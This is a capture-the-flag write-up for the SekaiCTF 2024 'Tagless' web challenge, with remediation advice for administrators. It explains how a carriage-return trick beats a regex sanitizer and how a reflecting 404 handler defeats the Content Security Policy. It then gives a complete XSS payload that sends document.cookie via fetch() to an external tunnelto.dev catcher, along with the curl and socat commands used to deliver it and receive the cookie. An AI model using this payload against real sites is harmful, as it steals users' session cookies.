This is a writeup for the SekaiCTF 2024 Tagless challenge.
- Challenge URL: https://2024.ctf.sekai.team/challenges/#Tagless-23
- Challenge category: Web
- Time required: 4h
- Date solved: 2024-08-24
Challenge Notes
Tagless
Who needs tags anyways
Author: elleuch
Solution Summary
Despite a sound Content Security Policy (CSP) in place, the application was susceptible to four vulnerabilities:
- The HTTP error handler allows arbitrary content injection
- HTTP responses do not instruct the browser to stop sniffing MIME types
- Untrusted user input is not sanitized correctly, due to a faulty blacklist-based sanitization function
- A harmless-looking input form allows chaining the above vulnerabilities to a complete exploit
These vulnerabilities allowed me to retrieve the flag.
Recommended measures for system administrators:
- Review web application Content Security Policies (CSPs):
- Review web application
X-Content-Type-Options
headers: - Review HTTP error handlers such as 404 handlers for arbitrary content injections. Learn more about Content Injection, also called Content Spoofing, here
Solution
Download and run app
We download the application source code from the following URL
https://2024.ctf.sekai.team/files/9822f07416cd5d230d9b7c9a97386bba/dist.zip
We review the contents of archive:
unzip -l dist.zip
Archive: dist.zip
Length Date Time Name
--------- ---------- ----- ----
758 08-16-2024 11:19 Dockerfile
60 08-16-2024 11:19 build-docker.sh
59 08-16-2024 11:19 requirements.txt
0 08-16-2024 11:19 src/
1277 08-16-2024 11:19 src/app.py
987 08-16-2024 11:19 src/bot.py
0 08-16-2024 11:19 src/static/
1816 08-16-2024 11:19 src/static/app.js
0 08-16-2024 11:19 src/templates/
1807 08-16-2024 11:19 src/templates/index.html
--------- -------
6764 10 files
The archive contains the following parts:
- A Flask application in
src/app.py
andsrc/bot.py
. - A Docker file to serve the application in
Dockerfile
and Python package requirements captured inrequirements.txt
. - A web page served by the above Flask application in
src/templates/index.html
andsrc/static/app.js
.
Let’s build and run Tagless using the Dockerfile
together with podman
:
mkdir dist.zip.unpacked
unzip dist.zip -d dist.zip.unpacked
podman build --tag tagless --file dist.zip.unpacked/Dockerfile
podman run -p 5000:5000 --name tagless tagless
Understanding the /
page script
The /
landing page can be passed the query parameters fulldisplay
, and
auto_input
.
We investigate src/static/app.js
to understand exactly what happens when the
landing page loads. Here’s the annotated and slightly abbreviated version to
show the code path that we are interested in:
// src/static/app.js
function sanitizeInput(str) {
str = str
.replace(/<.*>/gim, "")
.replace(/<\.*>/gim, "")
.replace(/<.*>.*<\/.*>/gim, "");
return str;
}
function autoDisplay() {
const urlParams = new URLSearchParams(window.location.search);
const input = urlParams.get("auto_input");
displayInput(input);
}
function displayInput(input) {
const urlParams = new URLSearchParams(window.location.search);
const fulldisplay = urlParams.get("fulldisplay");
var sanitizedInput = "";
sanitizedInput = sanitizeInput(input);
var iframe = document.getElementById("displayFrame");
var iframeContent = `
<!DOCTYPE html>
<head>
<title>Display</title>
<link href="https://fonts.googleapis.com/css?family=Press+Start+2P" rel="stylesheet">
<style>
body {
font-family: 'Press Start 2P', cursive;
color: #212529;
padding: 10px;
}
</style>
</head>
<body>
${sanitizedInput}
</body>
`;
iframe.contentWindow.document.open("text/html", "replace");
iframe.contentWindow.document.write(iframeContent);
iframe.contentWindow.document.close();
if (fulldisplay && sanitizedInput) {
var tab = open("/");
tab.document.write(
iframe.contentWindow.document.documentElement.innerHTML,
);
}
}
autoDisplay();
When the landing page loads with a URL of the form
/?autodisplay&auto_input=XSS
, the above script will do the following:
- Call
autoDisplay()
- Retrieve the
auto_input
URL query parameter. - Retrieve the
fulldisplay
URL query parameter. - Sanitize
auto_input
insanitizeInput()
by: - Removing all strings of the form
<TAG>
or<>
using the regular expression<.*>
. - Removing all strings of the form
<.TAG>
or<.>
using the regular expression<\.*>
(typo?). - Remove all strings of the form
<TAG>...</TAG>
or just<></>
using the regular expression<.*>.*<\/.*>
. - Create a new
<iframe>
with some standard HTML and the sanitized input created above inserted into the<body>
tag. - Open the
<iframe>
in a new window usingopen("/").document.write()
The (abbreviated) <iframe>
contents will therefore look like the following,
for input auto_input=XSS
:
<!doctype html>
<head>
<title>Display</title>
<!-- ... -->
</head>
<body>
XSS
</body>
We note at this point, that the regular expressions above have on fatal flaw.
The period character .
matches anything, except for newline-like characters.
If the snippet we pass contains a tag like <script>window.alert()</script>
,
it will get filtered out.
If we instead add a few carriage return in the right spot, we can fool our
sanitizeInput()
function into leaving us alone.
After messing around in regex101 for a while, I came
up with the following prototype injection:
<script\x0d>window.alert()</\0x0dscript>
Where \0x0d
indicates a carriage return insertion. Inserted into a URL, this
will look like the following:
/?autodisplay&auto_input=<script%0d>window.alert()</%0dscript>
Understanding the /report
endpoint
Next, we study the Python application’s source code to see how we can leverage the above sanitization circumvention into a reflected XSS attack.
Here’s the annotated source for report()
in src/app.py
:
# src/app.py
@app.route("/report", methods=["POST"])
def report():
# The actual Bot() code is described further below
bot = Bot()
# Require `url` x-www-url-form-encoded parameter
url = request.form.get('url')
if url:
try:
parsed_url = urlparse(url)
# URL must be
# 1. valid URL
except Exception:
return {"error": "Invalid URL."}, 400
# 2. start with http/https
if parsed_url.scheme not in ["http", "https"]:
return {"error": "Invalid scheme."}, 400
# 3. must be localhost or 127.0.0.1
if parsed_url.hostname not in ["127.0.0.1", "localhost"]:
return {"error": "Invalid host."}, 401
# the bot visits the page, but nothing else
bot.visit(url)
bot.close()
return {"visited":url}, 200
else:
return {"error":"URL parameter is missing!"}, 400
The report endpoint is a typical XSS bot endpoint used in CTFs. It is meant to simulate another user opening a link that we provide and triggering a reflected XSS injection.
For example, if we pass the URL http://localhost:5000
to the /report
endpoint, the application spawns a headless browser and visits the URL.
We can achieve this with Curl using the following command:
curl http://localhost:5000/report --data 'url=http://localhost:5000'
To understand what happens when the bot visits the page using bot.visit(url)
,
we look at the Bot
class source in src/bot.py
from selenium import webdriver
#...
class Bot:
def __init__(self):
chrome_options = Options()
# ...
self.driver = webdriver.Chrome(options=chrome_options)
def visit(self, url):
# Visit the application's landing page
self.driver.get("http://127.0.0.1:5000/")
# Add a document.cookie containing the challenge flag
self.driver.add_cookie({
"name": "flag",
"value": "SEKAI{dummy}",
"httponly": False
})
# Retrieve the url passed to us in the `/report` POST request
self.driver.get(url)
# Wait a bit, and we are finished
time.sleep(1)
self.driver.refresh()
print(f"Visited {url}")
# ...
If we want to read out the cookie, we need to craft a JavaScript payload that
will read out document.cookie
and send it to an endpoint we provide it using
fetch()
.
We then insert this payload into the landing page /?auto_input=XSS
query
parameter, and instruct the /report
endpoint to open it using the Bot()
:
curl http://127.0.0.1:5000/report \
--data 'url=http://127.0.0.1:5000/?fulldisplay&auto_input=XSS'
In comes a CSP
Unfortunately, while we were dreaming about solving this challenge after only a few minutes, we realize that a Content Security Policy (CSP) is in place, preventing us from injecting untrusted scripts:
# src/app.py
@app.after_request
def add_security_headers(resp):
resp.headers['Content-Security-Policy'] = "script-src 'self'; style-src 'self' https://fonts.googleapis.com https://unpkg.com 'unsafe-inline'; font-src https://fonts.gstatic.com;"
return resp
The relevant CSP that blocks untrusted JavaScript execution is:
script-src `self`;
With the above code, a browser is instructed to ignore any script sources that
do not come from the page’s origin at http://127.0.0.1:5000
. Should we now
try to inject a JavaScript snippet like the following, it will not work:
<script>
window.alert("xss");
</script>
The browser will refuse to run the above piece of JavaScript, because the CSP
disallows unsafe-inline
execution and only permits self
.
Read more about available CSP source values on MDN.
Therefore, opening the following URL will not work, even if we are able to circumvent the script tag filtering:
http://127.0.0.1:5000/?autodisplay&auto_input=<script%0d>window.alert()</%0dscript>
The only way we can execute JavaScript is by making it “look” like it comes from the application origin itself.
Exploiting the 404 endpoint
We direct our attention towards the 404 endpoint. This is the source code for the application’s 404 error handler:
@app.errorhandler(404)
def page_not_found(error):
path = request.path
return f"{path} not found"
This will return a 404 HTTP response and a nicely formatted response body. If
we open the non-existing URL /does-not-exist
, it will dutifully return:
/does-not-exist not found
We can feed this URL anything, really anything, and it will give us the text back, unchanged. Including something that looks like JavaScript:
http://127.0.0.1:5000/a/;window.alert();//
We receive the following response when opening the above URL:
/a/;
window.alert(); // not found
That is perfectly valid JavaScript. We turn the path starting with a /
into a
stranded regular expression literal, and the trailing not found
into a nice
little comment. This way, we can create any JavaScript snippet and make it look
like it comes from the same origin.
We have therefore found a way to defeat the content security policy.
Missing MIME type hardening
It’s easy to forget about MIME type sniffing
Even better, the application conveniently forgets to instruct the browser to
ignore Content-Type
mime types when evaluating the above not found URL.
X-Content-Type-Options should have been set.
The error page is served as a Content-Type: text/plain
, but our browser
thinks its smarter and will gladly interpret it as
Content-Type: application/javascript
instead. That’s why hardening
applications is so important.
Crafting the XSS payload
We have achieved the following four things:
- We have identified a vulnerability in the input sanitization.
- We found the exact point where JavaScript can be injected into the
/
page and how to extract the cookie flag. - We identified a vulnerability in the 404 handler, allowing us to create same-origin resources.
- We found that a missing
X-Content-Type-Options
header allows us to create arbitrary JavaScript snippet and have the browser creatively interpret it as JavaScript
A little hiccup that I had was swapping localhost
and 127.0.0.1
while
working on this challenge. It is very important to observe that cookie domains
are not interchangeable, even for localhost
. The Bot
’s cookie is set for
127.0.0.1
because of the following snippet in Bot.visit(self, url)
:
self.driver.get("http://127.0.0.1:5000/")
# Add a document.cookie containing the challenge flag
self.driver.add_cookie({
"name": "flag",
"value": "SEKAI{dummy}",
"httponly": False
})
We spin up a request catcher using tunnelto.dev
. I
prefer it over ngrok
for two reasons:
- It’s much cheaper than
ngrok
($4 per month). - The client is free software and
available on
nixpkgs
.
I prefer free software for many reasons. NixOS rightfully complains about
running the non-free ngrok
with
long-winded warnings texts when trying to install it.
We start a challenge instance on tagless-XXXXXXXXXXXX.chals.sekai.team
, and
launch tunnelto
with socat
listening.
# Launch tunnelto
tunnelto --subdomain XXXXXXXXXXX --port 4444
# Launch socat
socat -v -d TCP-Listen:4444,fork STDIO
We craft the final payload and store it in payload.txt
:
// payload.txt
http://127.0.0.1:5000/?fulldisplay=1&auto_input=<script src="http://127.0.0.1:5000/a/;fetch('https://XXXXXXXX.tunnelto.dev/'.concat('',document.cookie));//"%0d/></script%0d>hello
Broken apart, the payload is:
// the `/` page url
const url = "http://127.0.0.1:5000/?fulldisplay=1&auto_input=";
// the script we make the 404 handler generate for us
const innerScript =
"fetch('https://XXXXXXXX.tunnelto.dev/'.concat('',document.cookie))";
// the URL that will return the above script
const errorUrl = `http://127.0.0.1:5000/a/;${innerScript};//`;
// the script tag we inject into the iframe
const outerScript = `<script src="${errorUrl}"%0d/></script%0d>`;
// the full payload we want to pass to `/report`
const payload = `${url}${outerScript}`;
“URL!” “Script!” “Payload!” “Evasion!”
“Go Captain XSS!”“By your powers combined, I am Captain XSS!”
Since we don’t like messing with URL escapes too much, we let Curl handle the
task for us using the --data-urlencode
flag:
curl https://tagless-XXXXXXXXXXXX.chals.sekai.team/report \
--data-urlencode url@payload.txt
socat
receives the flag, and we are warmed up without tags.